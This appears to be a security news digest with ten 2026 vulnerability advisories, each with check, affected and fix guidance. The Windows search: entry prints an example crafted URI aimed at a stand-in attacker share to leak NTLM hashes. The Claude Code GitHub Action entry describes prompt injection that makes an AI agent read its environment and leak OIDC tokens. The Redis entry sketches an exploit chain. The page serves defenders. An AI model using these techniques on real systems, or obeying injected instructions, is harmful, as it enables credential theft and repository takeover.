Last updated: July 6, 2026 at 12:53 AM UTC
All 559 Vulnerability 199 Breach 107 Threat 246 Defense 7

SolarWinds Serv-U flaw exploited to crash file-transfer servers, now in CISA KEV

CISA has warned that attackers are actively exploiting CVE-2026-28318, a high-severity SolarWinds Serv-U denial-of-service flaw, and added it to the Known Exploited Vulnerabilities catalog. Serv-U is SolarWinds' Windows and Linux managed-file-transfer and FTP software. The flaw is an uncontrolled-resource-consumption weakness: specially crafted POST requests using Content-Encoding: deflate crash the Serv-U service without authentication, in low-complexity attacks needing no user interaction. SolarWinds shipped Serv-U 15.5.4 Hotfix 1 and advised admins who cannot patch to restrict access and block POST requests containing content-encoding. Shodan tracks over 12,000 exposed Serv-U servers (Shadowserver around 3,100). FCEB agencies must patch by June 19 under BOD 22-01.

Check
Inventory SolarWinds Serv-U servers, especially internet-exposed ones (Shodan shows 12,000+). Confirm Serv-U 15.5.4 Hotfix 1 is applied. Monitor for crashes and crafted deflate POST requests.
Affected
SolarWinds Serv-U MFT/FTP servers before 15.5.4 Hotfix 1. Unauthenticated, low-complexity DoS via POST requests using Content-Encoding: deflate. Over 12,000 instances exposed online per Shodan.
Fix
Apply Serv-U 15.5.4 Hotfix 1. If patching must wait, restrict access to known addresses and block POST requests containing content-encoding. FCEB agencies must remediate by June 19.

Critical Everest Forms WordPress plugin flaw exploited to create rogue admins

Wordfence reports active exploitation of CVE-2026-3300 (CVSS 9.8), a remote code execution flaw in the Everest Forms Pro WordPress plugin (about 4,000 active installations) affecting all versions up to 1.9.12. The Calculation Addon's process_filter() function concatenates user-submitted form-field values into a PHP string and passes it to eval() without proper escaping; sanitize_text_field() does not escape single quotes, so unauthenticated attackers can inject and run arbitrary PHP by submitting a crafted value in any string-type field when a form uses the Complex Calculation feature. Exploitation began April 13; Wordfence has blocked 29,300+ attempts. The common payload creates a rogue admin named 'diksimarina.' Patch 1.9.13 shipped March 18.

Check
Inventory WordPress sites for Everest Forms Pro and confirm version 1.9.13 or later. Audit for a rogue admin named 'diksimarina' and review forms using the Complex Calculation feature.
Affected
Everest Forms Pro versions up to 1.9.12 using the Complex Calculation feature. Unauthenticated attackers inject PHP via any string-type field into an unescaped eval(). Exploited since April 13.
Fix
Upgrade Everest Forms Pro to 1.9.13 immediately. Remove rogue admins (e.g. 'diksimarina'), rotate admin credentials, and audit for web shells. Block the published attacker IPs.

Claude Code GitHub Action flaw let one malicious issue hijack repos via prompt injection and OIDC token theft - bot-trigger bypass

Researcher RyotaK has disclosed a now-patched flaw in Anthropic's Claude Code GitHub Action, which drops Claude into CI/CD to triage issues and review PRs with broad repo permissions. The action's trigger check waved through any actor whose name ended in [bot] - but anyone can register a GitHub App and use its token to open an issue on a public repo. Agent mode lacked the human-actor check tag mode had. The attacker then used indirect prompt injection in an issue to make Claude read /proc/self/environ and write back the OIDC credentials, which can be replayed for an installation token with write access. Anthropic's example workflow shipped with allowed_non_write_users: '*'.

Check
Audit repos using Claude Code GitHub Action: update to the patched version, and check workflows for allowed_non_write_users set to '*'. Review public run summaries for leaked secrets.
Affected
Repositories using vulnerable Claude Code GitHub Action versions, especially in agent mode or with allowed_non_write_users: '*' copied from Anthropic's example. Public repos are exposed to [bot]-triggered prompt-injection attacks.
Fix
Update the Claude Code action to the fixed release. Remove allowed_non_write_users: '*', restrict triggers to write-access humans, and rotate any OIDC-derived tokens. Avoid posting task output to public run summaries.

Cisco Unified CM critical SSRF CVE-2026-20230 lets unauthenticated attackers write files and escalate to root - public PoC, WebDialer required

Cisco has patched CVE-2026-20230, a critical server-side request forgery flaw in Unified Communications Manager (formerly CallManager), the central control system for Cisco IP telephony. An unauthenticated remote attacker can send a crafted HTTP request to write files to the underlying OS and later elevate to root - Cisco rated it Critical despite the CVSS score because of that root-escalation potential. Cisco's PSIRT is aware of public proof-of-concept exploit code but has not seen active exploitation yet. The flaw only affects systems with the WebDialer service enabled, which is off by default. There are no workarounds; admins should upgrade to 14SU6 or 15SU5, or disable WebDialer until patched.

Check
Inventory Cisco Unified CM deployments and check whether WebDialer is enabled (Tools > Service Activation > CTI Services). Confirm version against fixed 14SU6 or 15SU5. Monitor for crafted HTTP requests.
Affected
Cisco Unified CM systems with the WebDialer service enabled (off by default). CVE-2026-20230 allows unauthenticated SSRF to write files and escalate to root. Public PoC exists; no active exploitation yet.
Fix
Upgrade to Unified CM 14SU6 or 15SU5. If patching must wait, disable the Cisco WebDialer Web Service via Service Activation to block exploitation. No other workaround exists.

VS Code zero-day lets one click steal full-scope GitHub OAuth token via github.dev webview - PoC public, no patch yet

Security researcher Ammar Askar has released exploit code for an unpatched VS Code zero-day that lets attackers steal GitHub OAuth tokens with a single click. The flaw abuses VS Code's sandboxed webview message-passing system: malicious JavaScript in a webview simulates keypresses in the main editor to install a malicious extension that captures the GitHub OAuth token github.com POSTs to github.dev. The token is not scoped to a single repo - it grants full access to every private repository the victim can reach. No CVE has been assigned and there is no patch. Users can mitigate by clearing github.dev cookies and on-device site data, which restores the sign-in prompt.

Check
Inventory developer machines using VS Code and github.dev. Warn developers not to click untrusted links that open github.dev. Audit installed VS Code extensions for unfamiliar additions.
Affected
VS Code users who authenticate to github.dev. The leaked GitHub OAuth token is unscoped, granting full access to every private repository the victim can reach. No patch or CVE yet.
Fix
Until patched: clear github.dev cookies and on-device site data so the sign-in prompt reappears. Treat unsolicited github.dev links as hostile. Rotate GitHub tokens if exposure is suspected.

HTTP/2 Bomb: single 100Mbps client crashes NGINX, Apache, IIS, Envoy, Cloudflare Pingora in seconds - found by OpenAI Codex agent

Offensive-security firm Calif, with discovery work performed by OpenAI's Codex software agent, has disclosed HTTP/2 Bomb, a denial-of-service attack that crashes web servers from a single machine in seconds. It works against default HTTP/2 configurations of NGINX, Apache, Microsoft IIS, Envoy, and Cloudflare Pingora. The technique combines HPACK header-compression amplification (one attacker byte triggering thousands of bytes of server allocation, up to 5,700:1 on Envoy) with Slowloris-style flow-control stalling via zero-byte windows that prevents the memory from ever being freed. A home computer on a 100 Mbps link can force Apache or Envoy to hold 32 GB of RAM in roughly 20 seconds, bypassing existing header-size defenses.

Check
Inventory internet-facing web servers and proxies running HTTP/2 (NGINX, Apache, IIS, Envoy, Cloudflare Pingora). Monitor for sudden per-connection memory spikes and stalled HTTP/2 streams with zero-window flow control.
Affected
Default HTTP/2 configurations of NGINX, Apache, IIS, Envoy, and Cloudflare Pingora. A single 100 Mbps client can hold 32 GB of server RAM in ~20 seconds, bypassing header-size limits.
Fix
Apply vendor HTTP/2 patches and mitigations as released. Cap per-connection memory and concurrent streams, enforce flow-control timeouts, and rate-limit HTTP/2 connections. Consider disabling HTTP/2 on exposed servers until patched.

Microsoft 365 Android apps leak FOCI SSO tokens to any local app via leftover setIsDebugMode(true) - four CVEs, six apps

Enclave researchers have disclosed FlagLeft, a flaw in Microsoft 365 Android apps that let any local app steal account tokens because a shared Microsoft SDK shipped with setIsDebugMode(true) left in production code, skipping the check that should reject untrusted apps requesting SSO handoff. The leaked FOCI single-sign-on tokens can be refreshed and reused over long periods, with traffic that looks routine in logs. It affected Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop, and OneNote (billions of downloads); Teams shipped the flag false and was unaffected. Microsoft issued four CVEs on May 12 (CVE-2026-41100/41101/41102/42832). The patched Android Word build is 16.0.19822.20190; a malicious on-device app is all it takes.

Check
Push Microsoft 365 Android app updates via MDM. Confirm Word is on build 16.0.19822.20190 or later and other apps updated through Google Play. Audit Android fleets for sideloaded apps.
Affected
Microsoft 365 Android apps (Word, PowerPoint, Excel, Copilot, Loop, OneNote) below the patched builds. A malicious on-device app can steal refreshable FOCI SSO tokens; Teams was unaffected.
Fix
Update all M365 Android apps from Google Play. Note the patch does not revoke already-stolen tokens - revoke active sessions for potentially-affected users and enforce app-install controls on managed devices.

Autonomous AI tool finds 2-year-old Redis use-after-free RCE CVE-2026-23479 - most cloud Redis runs passwordless, exploit public

Team Xint Code has disclosed CVE-2026-23479, a use-after-free remote code execution flaw in Redis that sat unnoticed in every stable branch from 7.2.0 until the May 5 fixes - over two years. The bug lives in unblockClientOnKey(), which keeps using a client pointer after processCommandAndResetClient() can free it. Exploitation needs an authenticated session, but Wiz's analysis finds Redis in most cloud environments with the majority running passwordless, where the default user already holds every privilege the exploit chain requires. The published exploit leaks a heap pointer via Lua, reclaims a freed client with a fake structure, and overwrites a GOT entry to repoint strcasecmp() at system(). NVD rates it 8.8.

Check
Inventory Redis instances and confirm version is past the May 5 fix. Identify passwordless or internet-reachable deployments. Audit for unexpected Lua EVAL activity and child processes spawned by redis-server.
Affected
Redis 7.2.0 through the May 5 fixes (over two years of stable branches). Exploitation needs an authenticated session, but most cloud Redis runs passwordless with the all-privileged default user.
Fix
Upgrade Redis to the patched release. Require authentication and strong ACLs, bind to localhost or private networks, never expose Redis to the internet. Enable full RELRO when building images.

Acer Wave 7 mesh routers: max-severity zero-days CVE-2026-49200/49201 expose plaintext credentials and hardcoded AES backdoor key, patch end of June

Acer is working to patch two maximum-severity zero-days in its Wave 7 mesh routers running firmware T7c_GBL_1.01.000055 or earlier, reported by researcher Gergo Pap. CVE-2026-49200 is a broken-access-control flaw: the acer_cgi.log file is reachable without authentication via the web interface and contains cleartext web and Telnet login credentials, leading to unauthorized system access. CVE-2026-49201 stems from a hardcoded AES key in the upload.cgi backup-processing binary, letting unauthenticated remote attackers decrypt, modify, and re-encrypt system backups to inject a persistent backdoor. No patches are available yet; Acer targets fixes by the end of June 2026 and urges users to update immediately once released.

Check
Inventory Acer Wave 7 mesh routers and confirm firmware version. Restrict web-interface and Telnet access to trusted networks. Watch for Acer's end-of-June firmware and apply immediately on release.
Affected
Acer Wave 7 routers on firmware T7c_GBL_1.01.000055 or earlier. CVE-2026-49200 exposes cleartext credentials in an unauthenticated log file; CVE-2026-49201's hardcoded AES key enables backdoored backups.
Fix
No patch yet (targeted end of June 2026). Disable remote/WAN management, restrict admin access to wired LAN, and rotate router and Telnet credentials. Apply Acer firmware the moment it ships.

Unpatched Windows search: URI handler leaks NTLMv2 hashes via crafted crumb=location UNC path - same class as patched Snipping Tool flaw

Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829 - the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April - achieving the same end via search:query and crumb=location: parameters pointing at an attacker UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply Huntress mitigations.

Check
Hunt for processes launching search: URIs with crumb=location pointing at UNC paths. Monitor outbound SMB (TCP 445) to external hosts. Educate users against approving search: link prompts.
Affected
Windows systems with the unpatched search: URI handler. A crafted link in a web page or email, once approved, forces an SMB connection that discloses the user's Net-NTLMv2 hash.
Fix
Block outbound SMB (TCP 445 and 139) at the perimeter. Enforce SMB signing and NTLM relay protections. Apply Huntress mitigations and disable the search: handler where feasible pending a patch.